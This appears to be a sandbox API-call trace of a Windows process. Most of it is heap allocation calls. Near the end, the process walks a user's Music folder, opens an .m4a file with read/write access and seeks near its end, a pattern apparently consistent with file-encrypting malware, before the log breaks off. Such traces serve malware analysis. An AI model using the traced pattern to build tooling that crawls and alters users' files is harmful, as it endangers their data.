RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0195.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0195.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0195.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0195.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.517] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.531] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.532] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.532] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.532] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0195.534] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.534] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0195.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0195.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0195.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0195.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0195.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0195.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0195.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.542] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.542] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.542] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.544] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.544] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.544] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.544] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.544] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0195.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0195.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0195.547] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.547] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.547] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.547] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0195.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.549] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.549] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.550] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.550] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.550] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.550] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0195.551] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.551] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0195.551] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0195.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.556] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\") returned="PsRcKmPEdiF_ OxVk\\" [0195.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0195.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b550 [0195.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.556] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\") returned="iPggquG4\\" [0195.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0195.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b550 | out: hHeap=0x6a0000) returned 1 [0195.557] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\") returned="fUhvLY4JeAGwk\\" [0195.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42730 [0195.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0195.557] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\") returned="Music\\" [0195.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0195.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42730 | out: hHeap=0x6a0000) returned 1 [0195.557] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0195.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0195.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.557] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0195.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0195.558] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0195.558] PathFindFileNameW (pszPath="") returned="" [0195.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.558] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\*" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3f885c20, ftCreationTime.dwHighDateTime=0x1d89bfa, ftLastAccessTime.dwLowDateTime=0x702a5b80, ftLastAccessTime.dwHighDateTime=0x1d8a451, ftLastWriteTime.dwLowDateTime=0x702a5b80, ftLastWriteTime.dwHighDateTime=0x1d8a451, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa90 [0195.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0195.561] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3f885c20, ftCreationTime.dwHighDateTime=0x1d89bfa, ftLastAccessTime.dwLowDateTime=0x702a5b80, ftLastAccessTime.dwHighDateTime=0x1d8a451, ftLastWriteTime.dwLowDateTime=0x702a5b80, ftLastWriteTime.dwHighDateTime=0x1d8a451, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.561] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd633daf0, ftCreationTime.dwHighDateTime=0x1d8a3cf, ftLastAccessTime.dwLowDateTime=0x1896ecc0, ftLastAccessTime.dwHighDateTime=0x1d8a623, ftLastWriteTime.dwLowDateTime=0x1896ecc0, ftLastWriteTime.dwHighDateTime=0x1d8a623, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0cC9EkHwaIG", cAlternateFileName="0CC9EK~1")) returned 1 [0195.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x7599e8 [0195.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2c16398 [0195.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa8) returned 0x2c2d920 [0195.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0195.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2be0bf0 [0195.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x781d38 [0195.562] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdb73d070, ftCreationTime.dwHighDateTime=0x1d8a6a3, ftLastAccessTime.dwLowDateTime=0xf0c05110, ftLastAccessTime.dwHighDateTime=0x1d8a6d5, ftLastWriteTime.dwLowDateTime=0xf0c05110, ftLastWriteTime.dwHighDateTime=0x1d8a6d5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="61X TO95hR3JMn6Z", cAlternateFileName="61XTO9~1")) returned 1 [0195.562] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77637e0, ftCreationTime.dwHighDateTime=0x1d89a32, ftLastAccessTime.dwLowDateTime=0xa6c307e0, ftLastAccessTime.dwHighDateTime=0x1d89c91, ftLastWriteTime.dwLowDateTime=0xa6c307e0, ftLastWriteTime.dwHighDateTime=0x1d89c91, nFileSizeHigh=0x0, nFileSizeLow=0x4283, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jYMAb2bdVruj9SV.m4a", cAlternateFileName="JYMAB2~1.M4A")) returned 1 [0195.562] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\jYMAb2bdVruj9SV.m4a") returned=".m4a" [0195.562] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\jYMAb2bdVruj9SV.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\jymab2bdvruj9sv.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0195.563] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=17027) returned 1 [0195.563] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0195.565] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x425d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.565] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, 